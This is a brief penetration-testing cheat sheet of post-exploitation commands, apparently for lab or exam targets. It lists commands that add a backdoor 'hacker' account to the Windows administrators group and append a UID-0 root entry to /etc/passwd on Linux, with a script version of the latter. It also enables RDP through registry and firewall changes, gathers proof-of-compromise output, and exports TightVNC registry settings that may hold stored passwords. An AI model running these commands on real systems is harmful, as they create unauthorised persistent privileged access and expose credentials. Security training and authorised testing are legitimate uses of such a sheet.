Create a new user

# windows
> net user hacker pass123 /add && net localgroup administrators hacker /add

# linux
# Generate password hash
> openssl passwd -1 -salt hacker pass123
# Add to /etc/passwd
> echo 'hacker:$1$hacker$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd
# If running a script
> echo 'echo "hacker:\$1\$hacker\$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash" >> /etc/passwd' > script.sh

Enable RDP

# powershell
> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
> Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
> Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1

# cmd
> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Proof

  • Collect proof of compromise
> hostname && id && cat proof.txt && ip a
> hostname && whoami && type proof.txt && ipconfig /all

TightVNC registry export

reg export “HKLM\Software\TightVNC\Server” foo.reg